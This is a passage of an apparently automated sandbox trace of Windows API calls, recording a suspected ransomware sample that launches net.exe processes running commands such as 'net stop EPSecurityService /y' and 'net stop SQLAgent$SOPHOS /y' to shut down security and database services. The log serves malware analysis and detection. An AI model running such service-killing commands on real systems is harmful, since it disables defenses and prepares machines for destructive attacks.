nSize=0x800, Arguments=0x99dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0039.467] GetFileType (hFile=0x26c) returned 0x3 [0039.467] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x3f6290 [0039.467] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x3f6290, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0039.467] WriteFile (in: hFile=0x26c, lpBuffer=0x3f6290*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1ff674, lpOverlapped=0x0 | out: lpBuffer=0x3f6290*, lpNumberOfBytesWritten=0x1ff674*=0x34, lpOverlapped=0x0) returned 1 [0039.467] LocalFree (hMem=0x3f6290) returned 0x0 [0039.467] GetFileType (hFile=0x26c) returned 0x3 [0039.467] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3f6290 [0039.467] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3f6290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n?", lpUsedDefaultChar=0x0) returned 2 [0039.467] WriteFile (in: hFile=0x26c, lpBuffer=0x3f6290*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1ff674, lpOverlapped=0x0 | out: lpBuffer=0x3f6290*, lpNumberOfBytesWritten=0x1ff674*=0x2, lpOverlapped=0x0) returned 1 [0039.467] LocalFree (hMem=0x3f6290) returned 0x0 [0039.467] NetApiBufferFree (Buffer=0x3f1c90) returned 0x0 [0039.467] NetApiBufferFree (Buffer=0x3f1ca8) returned 0x0 [0039.467] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$TPSAMA /y" [0039.467] exit (_Code=2) Process: id = "43" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x48d41000" os_pid = "0x80c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop EPSecurityService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 111 os_tid = 0x810 Process: id = "44" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x49490000" os_pid = "0x808" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "43" os_parent_pid = "0x80c" cmd_line = "C:\\Windows\\system32\\net1 stop EPSecurityService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 112 os_tid = 0x6d0 [0039.617] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xffa8c | out: lpSystemTimeAsFileTime=0xffa8c*(dwLowDateTime=0xe1d16320, dwHighDateTime=0x1d57a86)) [0039.617] GetCurrentProcessId () returned 0x808 [0039.617] GetCurrentThreadId () returned 0x6d0 [0039.617] GetTickCount () returned 0x1144e7e [0039.617] QueryPerformanceCounter (in: lpPerformanceCount=0xffa84 | out: lpPerformanceCount=0xffa84*=15990163022) returned 1 [0039.617] GetModuleHandleA (lpModuleName=0x0) returned 0xe70000 [0039.617] __set_app_type (_Type=0x1) [0039.617] __p__fmode () returned 0x74eb31f4 [0039.617] __p__commode () returned 0x74eb31fc [0039.617] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe7ffe6) returned 0x0 [0039.618] __getmainargs (in: _Argc=0xe89064, _Argv=0xe8906c, _Env=0xe89068, _DoWildCard=0, _StartInfo=0xe89024 | out: _Argc=0xe89064, _Argv=0xe8906c, _Env=0xe89068) returned 0 [0039.618] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0039.618] GetConsoleOutputCP () returned 0x1b5 [0039.618] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe89080 | out: lpCPInfo=0xe89080) returned 1 [0039.618] SetThreadUILanguage (LangId=0x0) returned 0x409 [0039.621] sprintf_s (in: _DstBuf=0xffa44, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0039.621] setlocale (category=0, locale=".437") returned="English_United States.437" [0039.623] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0039.623] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0039.623] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop EPSecurityService /y" [0039.623] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xff810, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0039.623] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x76) returned 0x53f788 [0039.623] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0039.623] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xffa14 | out: Buffer=0xffa14*=0x541c78) returned 0x0 [0039.623] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xffa14 | out: Buffer=0xffa14*=0x541c90) returned 0x0 [0039.623] _fileno (_File=0x74eb2900) returned -2 [0039.623] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0039.623] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0039.623] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0039.623] _wcsicmp (_String1="config", _String2="stop") returned -16 [0039.623] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0039.624] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0039.624] _wcsicmp (_String1="file", _String2="stop") returned -13 [0039.624] _wcsicmp (_String1="files", _String2="stop") returned -13 [0039.624] _wcsicmp (_String1="group", _String2="stop") returned -12 [0039.624] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0039.624] _wcsicmp (_String1="help", _String2="stop") returned -11 [0039.624] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0039.624] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0039.624] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0039.624] _wcsicmp (_String1="session", _String2="stop") returned -15 [0039.624] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0039.624] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0039.624] _wcsicmp (_String1="share", _String2="stop") returned -12 [0039.624] _wcsicmp (_String1="start", _String2="stop") returned -14 [0039.624] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0039.624] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0039.624] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0039.624] _wcsicmp (_String1="accounts", _String2="EPSecurityService") returned -4 [0039.624] _wcsicmp (_String1="computer", _String2="EPSecurityService") returned -2 [0039.624] _wcsicmp (_String1="config", _String2="EPSecurityService") returned -2 [0039.624] _wcsicmp (_String1="continue", _String2="EPSecurityService") returned -2 [0039.624] _wcsicmp (_String1="cont", _String2="EPSecurityService") returned -2 [0039.624] _wcsicmp (_String1="file", _String2="EPSecurityService") returned 1 [0039.624] _wcsicmp (_String1="files", _String2="EPSecurityService") returned 1 [0039.624] _wcsicmp (_String1="group", _String2="EPSecurityService") returned 2 [0039.624] _wcsicmp (_String1="groups", _String2="EPSecurityService") returned 2 [0039.624] _wcsicmp (_String1="help", _String2="EPSecurityService") returned 3 [0039.624] _wcsicmp (_String1="helpmsg", _String2="EPSecurityService") returned 3 [0039.624] _wcsicmp (_String1="localgroup", _String2="EPSecurityService") returned 7 [0039.624] _wcsicmp (_String1="pause", _String2="EPSecurityService") returned 11 [0039.624] _wcsicmp (_String1="session", _String2="EPSecurityService") returned 14 [0039.624] _wcsicmp (_String1="sessions", _String2="EPSecurityService") returned 14 [0039.624] _wcsicmp (_String1="sess", _String2="EPSecurityService") returned 14 [0039.624] _wcsicmp (_String1="share", _String2="EPSecurityService") returned 14 [0039.624] _wcsicmp (_String1="start", _String2="EPSecurityService") returned 14 [0039.624] _wcsicmp (_String1="stats", _String2="EPSecurityService") returned 14 [0039.625] _wcsicmp (_String1="statistics", _String2="EPSecurityService") returned 14 [0039.625] _wcsicmp (_String1="stop", _String2="EPSecurityService") returned 14 [0039.625] _wcsicmp (_String1="time", _String2="EPSecurityService") returned 15 [0039.625] _wcsicmp (_String1="user", _String2="EPSecurityService") returned 16 [0039.625] _wcsicmp (_String1="users", _String2="EPSecurityService") returned 16 [0039.625] _wcsicmp (_String1="msg", _String2="EPSecurityService") returned 8 [0039.625] _wcsicmp (_String1="messenger", _String2="EPSecurityService") returned 8 [0039.625] _wcsicmp (_String1="receiver", _String2="EPSecurityService") returned 13 [0039.625] _wcsicmp (_String1="rcv", _String2="EPSecurityService") returned 13 [0039.625] _wcsicmp (_String1="netpopup", _String2="EPSecurityService") returned 9 [0039.625] _wcsicmp (_String1="redirector", _String2="EPSecurityService") returned 13 [0039.625] _wcsicmp (_String1="redir", _String2="EPSecurityService") returned 13 [0039.625] _wcsicmp (_String1="rdr", _String2="EPSecurityService") returned 13 [0039.625] _wcsicmp (_String1="workstation", _String2="EPSecurityService") returned 18 [0039.625] _wcsicmp (_String1="work", _String2="EPSecurityService") returned 18 [0039.625] _wcsicmp (_String1="wksta", _String2="EPSecurityService") returned 18 [0039.625] _wcsicmp (_String1="prdr", _String2="EPSecurityService") returned 11 [0039.625] _wcsicmp (_String1="devrdr", _String2="EPSecurityService") returned -1 [0039.625] _wcsicmp (_String1="lanmanworkstation", _String2="EPSecurityService") returned 7 [0039.625] _wcsicmp (_String1="server", _String2="EPSecurityService") returned 14 [0039.625] _wcsicmp (_String1="svr", _String2="EPSecurityService") returned 14 [0039.625] _wcsicmp (_String1="srv", _String2="EPSecurityService") returned 14 [0039.625] _wcsicmp (_String1="lanmanserver", _String2="EPSecurityService") returned 7 [0039.625] _wcsicmp (_String1="alerter", _String2="EPSecurityService") returned -4 [0039.625] _wcsicmp (_String1="netlogon", _String2="EPSecurityService") returned 9 [0039.625] _wcsupr (in: _String="EPSecurityService" | out: _String="EPSECURITYSERVICE") returned="EPSECURITYSERVICE" [0039.625] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x545460 [0039.628] GetServiceKeyNameW (in: hSCManager=0x545460, lpDisplayName="EPSECURITYSERVICE", lpServiceName=0xe8aaf0, lpcchBuffer=0xff9b0 | out: lpServiceName="", lpcchBuffer=0xff9b0) returned 0 [0039.629] _wcsicmp (_String1="msg", _String2="EPSECURITYSERVICE") returned 8 [0039.629] _wcsicmp (_String1="messenger", _String2="EPSECURITYSERVICE") returned 8 [0039.629] _wcsicmp (_String1="receiver", _String2="EPSECURITYSERVICE") returned 13 [0039.629] _wcsicmp (_String1="rcv", _String2="EPSECURITYSERVICE") returned 13 [0039.629] _wcsicmp (_String1="redirector", _String2="EPSECURITYSERVICE") returned 13 [0039.629] _wcsicmp (_String1="redir", _String2="EPSECURITYSERVICE") returned 13 [0039.629] _wcsicmp (_String1="rdr", _String2="EPSECURITYSERVICE") returned 13 [0039.629] _wcsicmp (_String1="workstation", _String2="EPSECURITYSERVICE") returned 18 [0039.629] _wcsicmp (_String1="work", _String2="EPSECURITYSERVICE") returned 18 [0039.629] _wcsicmp (_String1="wksta", _String2="EPSECURITYSERVICE") returned 18 [0039.629] _wcsicmp (_String1="prdr", _String2="EPSECURITYSERVICE") returned 11 [0039.629] _wcsicmp (_String1="devrdr", _String2="EPSECURITYSERVICE") returned -1 [0039.629] _wcsicmp (_String1="lanmanworkstation", _String2="EPSECURITYSERVICE") returned 7 [0039.629] _wcsicmp (_String1="server", _String2="EPSECURITYSERVICE") returned 14 [0039.629] _wcsicmp (_String1="svr", _String2="EPSECURITYSERVICE") returned 14 [0039.629] _wcsicmp (_String1="srv", _String2="EPSECURITYSERVICE") returned 14 [0039.629] _wcsicmp (_String1="lanmanserver", _String2="EPSECURITYSERVICE") returned 7 [0039.629] _wcsicmp (_String1="alerter", _String2="EPSECURITYSERVICE") returned -4 [0039.629] _wcsicmp (_String1="netlogon", _String2="EPSECURITYSERVICE") returned 9 [0039.629] NetServiceControl (in: servername=0x0, service="EPSECURITYSERVICE", opcode=0x0, arg=0x0, bufptr=0xff9ac | out: bufptr=0xff9ac) returned 0x889 [0039.630] wcscpy_s (in: _Destination=0xe8a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0039.630] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74770000 [0039.630] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74770000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe8b338, nSize=0x800, Arguments=0xe89dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0039.632] GetFileType (hFile=0x26c) returned 0x3 [0039.632] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x543f90 [0039.632] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x543f90, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0039.632] WriteFile (in: hFile=0x26c, lpBuffer=0x543f90*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0xff8ec, lpOverlapped=0x0 | out: lpBuffer=0x543f90*, lpNumberOfBytesWritten=0xff8ec*=0x1e, lpOverlapped=0x0) returned 1 [0039.632] LocalFree (hMem=0x543f90) returned 0x0 [0039.632] GetFileType (hFile=0x26c) returned 0x3 [0039.632] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x546238 [0039.632] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x546238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nT", lpUsedDefaultChar=0x0) returned 2 [0039.632] WriteFile (in: hFile=0x26c, lpBuffer=0x546238*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xff8ec, lpOverlapped=0x0 | out: lpBuffer=0x546238*, lpNumberOfBytesWritten=0xff8ec*=0x2, lpOverlapped=0x0) returned 1 [0039.632] LocalFree (hMem=0x546238) returned 0x0 [0039.632] _ultow (in: _Dest=0x889, _Radix=1046812 | out: _Dest=0x889) returned="2185" [0039.632] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74770000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe8b338, nSize=0x800, Arguments=0xe89dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0039.632] GetFileType (hFile=0x26c) returned 0x3 [0039.632] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x546238 [0039.632] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x546238, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0039.632] WriteFile (in: hFile=0x26c, lpBuffer=0x546238*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0xff8f8, lpOverlapped=0x0 | out: lpBuffer=0x546238*, lpNumberOfBytesWritten=0xff8f8*=0x34, lpOverlapped=0x0) returned 1 [0039.632] LocalFree (hMem=0x546238) returned 0x0 [0039.632] GetFileType (hFile=0x26c) returned 0x3 [0039.632] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x546238 [0039.632] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x546238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nT", lpUsedDefaultChar=0x0) returned 2 [0039.632] WriteFile (in: hFile=0x26c, lpBuffer=0x546238*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xff8f8, lpOverlapped=0x0 | out: lpBuffer=0x546238*, lpNumberOfBytesWritten=0xff8f8*=0x2, lpOverlapped=0x0) returned 1 [0039.633] LocalFree (hMem=0x546238) returned 0x0 [0039.633] NetApiBufferFree (Buffer=0x541c78) returned 0x0 [0039.633] NetApiBufferFree (Buffer=0x541c90) returned 0x0 [0039.633] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop EPSecurityService /y" [0039.633] exit (_Code=2) Process: id = "45" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x48446000" os_pid = "0x5a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop SQLAgent$SOPHOS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 113 os_tid = 0x534 Process: id = "46" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x476ee000" os_pid = "0x5c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "45" os_parent_pid = "0x5a8" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$SOPHOS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 114 os_tid = 0x320 [0039.831] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x31f794 | out: lpSystemTimeAsFileTime=0x31f794*(dwLowDateTime=0xe1f2b660, dwHighDateTime=0x1d57a86)) [0039.831] GetCurrentProcessId () returned 0x5c8 [0039.831] GetCurrentThreadId () returned 0x320 [0039.831] GetTickCount () returned 0x1144f59 [0039.831] QueryPerformanceCounter (in: lpPerformanceCount=0x31f78c | out: lpPerformanceCount=0x31f78c*=16011560148) returned 1 [0039.831] GetModuleHandleA (lpModuleName=0x0) returned 0x960000 [0039.831] __set_app_type (_Type=0x1) [0039.831] __p__fmode () returned 0x74eb31f4 [0039.831] __p__commode () returned 0x74eb31fc [0039.831] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x96ffe6) returned 0x0 [0039.832] __getmainargs (in: _Argc=0x979064, _Argv=0x97906c, _Env=0x979068, _DoWildCard=0, _StartInfo=0x979024 | out: _Argc=0x979064, _Argv=0x97906c, _Env=0x979068) returned 0 [0039.832] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0039.832] GetConsoleOutputCP () returned 0x1b5 [0039.832] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x979080 | out: lpCPInfo=0x979080) returned 1 [0039.832] SetThreadUILanguage (LangId=0x0) returned 0x409 [0039.835] sprintf_s (in: _DstBuf=0x31f74c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0039.835] setlocale (category=0, locale=".437") returned="English_United States.437" [0039.837] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0039.837] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0039.837] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$SOPHOS /y" [0039.837] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x31f518, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0039.837] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x72) returned 0x41f788 [0039.837] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0039.837] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x31f71c | out: Buffer=0x31f71c*=0x421c78) returned 0x0 [0039.837] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x31f71c | out: Buffer=0x31f71c*=0x421c90) returned 0x0 [0039.837] _fileno (_File=0x74eb2900) returned -2 [0039.837] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0039.837] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0039.838] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0039.838] _wcsicmp (_String1="config", _String2="stop") returned -16 [0039.838] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0039.838] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0039.838] _wcsicmp (_String1="file", _String2="stop") returned -13 [0039.838] _wcsicmp (_String1="files", _String2="stop") returned -13 [0039.838] _wcsicmp (_String1="group", _String2="stop") returned -12 [0039.838] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0039.838] _wcsicmp (_String1="help", _String2="stop") returned -11 [0039.838] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0039.838] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0039.838] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0039.838] _wcsicmp (_String1="session", _String2="stop") returned -15 [0039.838] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0039.838] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0039.838] _wcsicmp (_String1="share", _String2="stop") returned -12 [0039.838] _wcsicmp (_String1="start", _String2="stop") returned -14 [0039.838] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0039.838] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0039.838] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0039.838] _wcsicmp (_String1="accounts", _String2="SQLAgent$SOPHOS") returned -18 [0039.838] _wcsicmp (_String1="computer", _String2="SQLAgent$SOPHOS") returned -16 [0039.838] _wcsicmp (_String1="config", _String2="SQLAgent$SOPHOS") returned -16 [0039.838] _wcsicmp (_String1="continue", _String2="SQLAgent$SOPHOS") returned -16 [0039.838] _wcsicmp (_String1="cont", _String2="SQLAgent$SOPHOS") returned -16 [0039.838] _wcsicmp (_String1="file", _String2="SQLAgent$SOPHOS") returned -13 [0039.838] _wcsicmp (_String1="files", _String2="SQLAgent$SOPHOS") returned -13 [0039.838] _wcsicmp (_String1="group", _String2="SQLAgent$SOPHOS") returned -12 [0039.838] _wcsicmp (_String1="groups", _String2="SQLAgent$SOPHOS") returned -12 [0039.838] _wcsicmp (_String1="help", _String2="SQLAgent$SOPHOS") returned -11 [0039.838] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$SOPHOS") returned -11 [0039.838] _wcsicmp (_String1="localgroup", _String2="SQLAgent$SOPHOS") returned -7 [0039.838] _wcsicmp (_String1="pause", _String2="SQLAgent$SOPHOS") returned -3 [0039.838] _wcsicmp (_String1="session", _String2="SQLAgent$SOPHOS") returned -12 [0039.838] _wcsicmp (_String1="sessions", _String2="SQLAgent$SOPHOS") returned -12 [0039.838] _wcsicmp (_String1="sess", _String2="SQLAgent$SOPHOS") returned -12 [0039.839] _wcsicmp (_String1="share", _String2="SQLAgent$SOPHOS") returned -9 [0039.839] _wcsicmp (_String1="start", _String2="SQLAgent$SOPHOS") returned 3 [0039.839] _wcsicmp (_String1="stats", _String2="SQLAgent$SOPHOS") returned 3 [0039.839] _wcsicmp (_String1="statistics", _String2="SQLAgent$SOPHOS") returned 3 [0039.839] _wcsicmp (_String1="stop", _String2="SQLAgent$SOPHOS") returned 3 [0039.839] _wcsicmp (_String1="time", _String2="SQLAgent$SOPHOS") returned 1 [0039.839] _wcsicmp (_String1="user", _String2="SQLAgent$SOPHOS") returned 2 [0039.839] _wcsicmp (_String1="users", _String2="SQLAgent$SOPHOS") returned 2 [0039.839] _wcsicmp (_String1="msg", _String2="SQLAgent$SOPHOS") returned -6 [0039.839] _wcsicmp (_String1="messenger", _String2="SQLAgent$SOPHOS") returned -6 [0039.839] _wcsicmp (_String1="receiver", _String2="SQLAgent$SOPHOS") returned -1 [0039.839] _wcsicmp (_String1="rcv", _String2="SQLAgent$SOPHOS") returned -1 [0039.839] _wcsicmp (_String1="netpopup", _String2="SQLAgent$SOPHOS") returned -5 [0039.839] _wcsicmp (_String1="redirector", _String2="SQLAgent$SOPHOS") returned -1 [0039.839] _wcsicmp (_String1="redir", _String2="SQLAgent$SOPHOS") returned -1 [0039.839] _wcsicmp (_String1="rdr", _String2="SQLAgent$SOPHOS") returned -1 [0039.839] _wcsicmp (_String1="workstation", _String2="SQLAgent$SOPHOS") returned 4 [0039.839] _wcsicmp (_String1="work", _String2="SQLAgent$SOPHOS") returned 4 [0039.839] _wcsicmp (_String1="wksta", _String2="SQLAgent$SOPHOS") returned 4 [0039.839] _wcsicmp (_String1="prdr", _String2="SQLAgent$SOPHOS") returned -3 [0039.839] _wcsicmp (_String1="devrdr", _String2="SQLAgent$SOPHOS") returned -15 [0039.839] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$SOPHOS") returned -7 [0039.839] _wcsicmp (_String1="server", _String2="SQLAgent$SOPHOS") returned -12 [0039.839] _wcsicmp (_String1="svr", _String2="SQLAgent$SOPHOS") returned 5 [0039.839] _wcsicmp (_String1="srv", _String2="SQLAgent$SOPHOS") returned 1 [0039.839] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$SOPHOS") returned -7 [0039.839] _wcsicmp (_String1="alerter", _String2="SQLAgent$SOPHOS") returned -18 [0039.839] _wcsicmp (_String1="netlogon", _String2="SQLAgent$SOPHOS") returned -5 [0039.839] _wcsupr (in: _String="SQLAgent$SOPHOS" | out: _String="SQLAGENT$SOPHOS") returned="SQLAGENT$SOPHOS" [0039.840] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x425460 [0039.842] GetServiceKeyNameW (in: hSCManager=0x425460, lpDisplayName="SQLAGENT$SOPHOS", lpServiceName=0x97aaf0, lpcchBuffer=0x31f6b8 | out: lpServiceName="", lpcchBuffer=0x31f6b8) returned 0 [0039.843] _wcsicmp (_String1="msg", _String2="SQLAGENT$SOPHOS") returned -6 [0039.843] _wcsicmp (_String1="messenger", _String2="SQLAGENT$SOPHOS") returned -6 [0039.843] _wcsicmp (_String1="receiver", _String2="SQLAGENT$SOPHOS") returned -1 [0039.843] _wcsicmp (_String1="rcv", _String2="SQLAGENT$SOPHOS") returned -1 [0039.843] _wcsicmp (_String1="redirector", _String2="SQLAGENT$SOPHOS") returned -1 [0039.843] _wcsicmp (_String1="redir", _String2="SQLAGENT$SOPHOS") returned -1 [0039.843] _wcsicmp (_String1="rdr", _String2="SQLAGENT$SOPHOS") returned -1 [0039.843] _wcsicmp (_String1="workstation", _String2="SQLAGENT$SOPHOS") returned 4 [0039.843] _wcsicmp (_String1="work", _String2="SQLAGENT$SOPHOS") returned 4 [0039.843] _wcsicmp (_String1="wksta", _String2="SQLAGENT$SOPHOS") returned 4 [0039.843] _wcsicmp (_String1="prdr", _String2="SQLAGENT$SOPHOS") returned -3 [0039.843] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$SOPHOS") returned -15 [0039.843] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$SOPHOS") returned -7 [0039.843] _wcsicmp (_String1="server", _String2="SQLAGENT$SOPHOS") 